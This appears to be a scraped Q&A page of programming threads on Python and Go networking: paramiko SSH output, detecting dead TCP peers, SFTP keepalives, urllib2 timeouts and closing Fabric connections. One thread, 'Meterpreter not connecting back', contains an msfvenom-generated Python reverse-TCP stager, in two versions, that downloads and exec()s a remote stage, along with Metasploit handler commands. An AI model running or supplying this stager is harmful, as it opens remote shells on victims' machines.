Paramiko get stdout from connection object (not exec_command) - python

I'm writing a script that uses paramiko to ssh onto several remote hosts and run a few checks. Some hosts are set up as fail-overs for others, and I can't determine which is in use until I try to connect. Upon connecting to one of these 'inactive' hosts, the host informs me that I need to connect to another 'active' IP and then closes the connection after n seconds. This appears to be written to the stdout of the SSH connection/session (i.e. it is not an SSH banner).
I've used paramiko quite a bit, but I'm at a loss as to how to get this output from the connection. exec_command will obviously give me stdout and stderr, but the host outputs this message immediately upon connection and doesn't accept any other incoming requests/messages; it just closes after n seconds.
I don't want to have to wait until the timeout to move on to the next host, and I'd also like to verify that that's the reason for not being able to connect and run the checks; otherwise my script works as intended.
Any suggestions as to how I can capture this output, with or without paramiko, are greatly appreciated.

I figured out a way to get the data. It was pretty straightforward, to be honest, albeit a little hackish. This might not work in other cases, especially if there is latency, but I could also be misunderstanding what's happening:
When the connection opens, the server spits out two messages, one saying it can't chdir to a particular directory, then a few milliseconds later it spits out another message stating that you need to connect to the other IP. If I send a command immediately after connecting (doesn't matter what command), exec_command will interpret this second message as the response. So for now I have a solution to my problem as I can check this string for a known message and change the flow of execution.
However, if what I describe is accurate, then this may not work in situations where there is too much latency and the 'test' command isn't sent before the server response has been received.
As far as I can tell (and I may be very wrong), there is currently no proper way to get the stdout stream immediately after opening the connection with paramiko. If someone knows a way, please let me know.
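For reference, here is a minimal sketch of the workaround described above. The host name, credentials, and the wording of the failover marker string are placeholders, not values from the question:

import paramiko

# Connect as usual; AutoAddPolicy is used here only to keep the sketch short.
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('host.example.com', username='user', password='secret', timeout=10)

# Fire a throwaway command immediately after connecting; on the 'inactive'
# hosts the server's greeting comes back as if it were this command's output.
stdin, stdout, stderr = client.exec_command('true')
output = stdout.read()

if 'connect to' in output:   # assumed wording of the known failover message
    print "Inactive host, trying the next one"
else:
    print "Active host, running checks"
client.close()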

Related

How to know if the remote tcp device is powered off

In my Go code, I am establishing a TCP connection as below:
package main

import (
	"fmt"
	"io"
	"net"
)

func main() {
	conn, err := net.Dial("tcp", "<remote_address>")
	if err != nil {
		panic(err)
	}
	buf := make([]byte, 256)
	_, err = conn.Read(buf) // Read returns a byte count, which we don't need here
	if err == io.EOF {
		// remote connection close handle
		fmt.Println("connection got reset by peer")
		panic(err)
	}
}
To simulate the other end, I am running a Python script on a different computer, which opens a socket and sends some random data to the socket the code above is reading from. Now my problem is: when I kill the Python script by pressing Ctrl+C, the remote-connection-closed event is recognised just fine by the code above and I get a chance to handle it.
However, if I simply turn off the remote computer (where the Python script is running), my code doesn't get notified at all.
In my case, the connection should always be opened and should be able to send the data randomly, and only if the remote machine gets powered off, my GO code should get notified.
Can someone help me with this scenario: how would I get notified when the remote machine hosting the socket itself gets powered off? How would I get the trigger remotely in my Go code?
PS - This seems to be a pretty common problem in the real world, though not in a testing environment.
There is no way to determine the difference between a host that is powered off and a connection that has been broken, so you treat them the same way.
You can send a heartbeat message on your own, and close the connection when you reach some timeout period between heartbeat packets. The timeout can either be set manually by timing the packets, or you can use SetReadDeadline before each read to terminate the connection immediately when the deadline is reached.
You can also use TCP Keepalive to do this for you, using TCPConn.SetKeepAlive to enable it and TCPConn.SetKeepAlivePeriod to set the interval between keepalive packets. The time it takes to actually close the connection will be system dependent.
You should also set a timeout when dialing, since connecting to a down host isn't guaranteed to return an ICMP Host Unreachable response. You can use DialTimeout, a net.Dialer with the Timeout parameter set, or Dialer.DialContext.
Simply reading through the stdlib documentation should provide you with plenty of information: https://golang.org/pkg/net/
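The heartbeat-plus-deadline pattern described above is language-agnostic; here is a minimal sketch in Python (matching the rest of this page) with the Go equivalents being SetReadDeadline and DialTimeout. The host, port, and intervals are assumptions:

import socket

HEARTBEAT_INTERVAL = 5  # seconds between heartbeats the peer promises to send

# Dial with a timeout, since a down host may never answer the SYN.
sock = socket.create_connection(('remote.example.com', 9000), timeout=10)
sock.settimeout(HEARTBEAT_INTERVAL * 2)  # read deadline: two missed beats = dead peer

try:
    while True:
        data = sock.recv(256)
        if not data:  # orderly close by the peer
            break
except socket.timeout:
    # No data within the deadline: treat the peer as powered off or unreachable.
    pass
finally:
    sock.close()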
You need to add some kind of heartbeat message. Then, looking at the Go documentation, you can use DialTimeout instead of Dial, and each time you receive the heartbeat (or any other message) you can reset the timeout.
Another alternative is to use TCP keepalive, which you can enable in Python using setsockopt. I can't really help you with Go, but this link gives a good description of how to enable keepalive with it:
http://felixge.de/2014/08/26/tcp-keepalive-with-golang.html
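For the Python side mentioned above, a minimal keepalive sketch looks like this. The three TCP_KEEP* options are Linux-specific, and the values and address are examples:

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)     # turn keepalive on
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 60)   # idle seconds before the first probe
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 10)  # seconds between probes
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)     # failed probes before the OS drops the connection
sock.connect(('remote.example.com', 9000))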

Meterpreter not connecting back - Python

I have used msfvenom to create the following python payload:
import socket, struct
s = socket.socket(2, socket.SOCK_STREAM)  # 2 == socket.AF_INET
s.connect(('MY PUBLIC IP', 3930))
l = struct.unpack('>I', s.recv(4))[0]     # 4-byte big-endian stage length
d = s.recv(l)
while len(d) < l:                         # keep reading until the full stage arrives
    d += s.recv(l - len(d))
exec(d, {'s': s})                         # run the received stage
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?
This is the code I would use for a reverse TCP shell on Unix systems, given the details you've provided. I stumbled upon your post while searching for the same error, though, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but recently it's begun to lag: it runs once on an internal system, but anything after that gives me the same error message you got. I also get the same message over WAN (as opposed to LAN), except there it doesn't run the first time either. What ISP do you have? It may be entirely dependent on that.
import socket, struct
s = socket.socket(2, 1)                # 2 == AF_INET, 1 == SOCK_STREAM
s.connect(('IP ADDRESS', 3930))
l = struct.unpack('>I', s.recv(4))[0]  # 4-byte big-endian stage length
d = s.recv(4096)
while len(d) < l:                      # '<' avoids looping forever if a read overshoots
    d += s.recv(4096)
exec(d, {'s': s})

Prevent SFTP/SSH session timeout with paramiko

I'm using paramiko to connect to an SFTP server on which I have to download and process some files.
The server has a timeout set to 5 minutes, but some days the processing of the files can take longer than that. So, when I then want to change the working directory on the server to process some other files (sftp.chdir(target_dir)), I get an exception because the connection has timed out:
File "build\bdist.win32\egg\paramiko\sftp.py", line 138, in _write_all
    raise EOFError()
To counter this I thought that activating the keep alive would be the best option so I used the "set_keepalive" on the transport to set it to 30 seconds:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ssh_server, port=ssh_port, username=ssh_user, password=password)
transport = ssh.get_transport()
transport.set_keepalive(30)
sftp = transport.open_sftp_client()
But it has no effect at all. I don't know if I'm misunderstanding the concept of set_keepalive, or whether the server (to which I have no access) simply ignores the keep-alive packets.
Isn't this the right way to counter this problem or should I try a different approach? I don't like the idea of "manually" sending some ls command to the server to keep the session alive.
If the server is timing you out for inactivity, there's not much you can do from the client-side (other than perhaps send a simple command every now and again to keep your session from timing out).
Have you considered breaking apart your download and processing steps, so that you can download everything you need to start with, then process it either asynchronously, or after all downloads have completed?
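A sketch of that download-first, process-later split. The server details, paths, and the process() function are placeholders:

import os
import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('sftp.example.com', username='user', password='secret')
sftp = ssh.open_sftp()

local_files = []
for name in sftp.listdir('/remote/dir'):
    local_path = os.path.join('/tmp/work', name)
    sftp.get('/remote/dir/' + name, local_path)  # downloads only, so the session stays busy and brief
    local_files.append(local_path)

sftp.close()
ssh.close()

# Process offline, with no live SFTP session left to time out.
for path in local_files:
    process(path)  # hypothetical processing function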

Python urllib2.urlopen bug: timeout error brings down my Internet connection?

I don't know if I'm doing something wrong, but I'm 100% sure it's the Python script that brings down my Internet connection.
I wrote a Python script to scrape the header info of thousands of files, mainly the Content-Length field, to get the exact size of each file using HEAD requests.
Sample code:
import urllib2

class HeadRequest(urllib2.Request):
    def get_method(self):
        return "HEAD"

response = urllib2.urlopen(HeadRequest("http://www.google.com"))
print response.info()
The thing is, after several hours of running, the script starts throwing "urlopen error timed out", and my Internet connection is down from then on. The connection always comes back immediately after I close the script. At the beginning I thought it might be an unstable connection, but after several runs it turned out to be the script's fault.
I don't know why, but this should be considered a bug, right? Or has my ISP banned me for doing such things? (I already set the program to wait 10 s between requests.)
BTW, I'm using a VPN; does that have something to do with this?
I'd guess that either your ISP or VPN provider is limiting you because of high-volume suspicious traffic, or your router or VPN tunnel is getting clogged up with half-open connections. Consumer internet is REALLY not intended for spider-type activities.
"the script starts to throw out urlopen error timed out"
We can't even begin to guess.
You need to gather data on your computer and include that data in your question.
Get another computer. Run your script. Is the other computer's internet access blocked also? Or does it still work?
If both computers are blocked, it's not your software, it's your provider. Update Your Question with this information, and how you got it.
If only the computer running the script is stopped, it's not your provider, it's your OS resources being exhausted. This is harder to diagnose because it could be memory, sockets or file descriptors. Usually it's sockets.
You need to find some ifconfig/ipconfig diagnostic software for your operating system. You need to update your question to state exactly what operating system you're using. You need to use this diagnostic software to see how many open sockets are cluttering up your system.
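If sockets turn out to be the culprit, making sure every response is closed promptly is a cheap first fix. A minimal sketch building on the HeadRequest class from the question (the URL and timeout are examples):

import contextlib
import urllib2

class HeadRequest(urllib2.Request):  # as defined in the question
    def get_method(self):
        return "HEAD"

# contextlib.closing guarantees the underlying socket is released even on errors.
request = HeadRequest("http://www.google.com")
with contextlib.closing(urllib2.urlopen(request, timeout=10)) as response:
    length = response.info().getheader('Content-Length')
print length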

Disconnecting from host with Python Fabric when using the API

The website says:
Closing connections: Fabric’s connection cache never closes connections itself – it leaves this up to whatever is using it. The fab tool does this bookkeeping for you: it iterates over all open connections and closes them just before it exits (regardless of whether the tasks failed or not).
Library users will need to ensure they explicitly close all open connections before their program exits, though we plan to make this easier in the future.
I have searched everywhere, but I can't find out how to disconnect or close the connections. I am looping through my hosts and setting env.host_string. It is working, but hangs when exiting. Any help on how to close? Just to reiterate, I am using the library, not a fabfile.
If you don't want to have to iterate through all open connections, fabric.network.disconnect_all() is what you're looking for. The docstring reads
"""
Disconnect from all currently connected servers.
Used at the end of fab's main loop, and also intended for use by library users.
"""
The main.py for fabric has this:
from fabric.state import commands, connections

for key in connections.keys():
    if state.output.status:
        print "Disconnecting from %s..." % denormalize(key),  # denormalize comes from fabric.network
    connections[key].close()
fabric.state.connections is a dict whose values are paramiko.SSHClient instances.
So off I go to close those.
You can disconnect from a specific connection, by host name, using the following code snippet (with fabric 1.10.1):
import fabric.api
import fabric.state

def disconnect(host=None):
    host = host or fabric.api.env.host_string
    if host and host in fabric.state.connections:
        fabric.state.connections[host].get_transport().close()
from fabric.network import disconnect_all
disconnect_all()
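Putting it together, a sketch of library-style usage with explicit cleanup, as discussed above. The host names and the command are examples:

import fabric.api
from fabric.network import disconnect_all

hosts = ['web1.example.com', 'web2.example.com']
try:
    for host in hosts:
        fabric.api.env.host_string = host
        fabric.api.run('uptime')
finally:
    disconnect_all()  # close every cached connection so the program can exit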
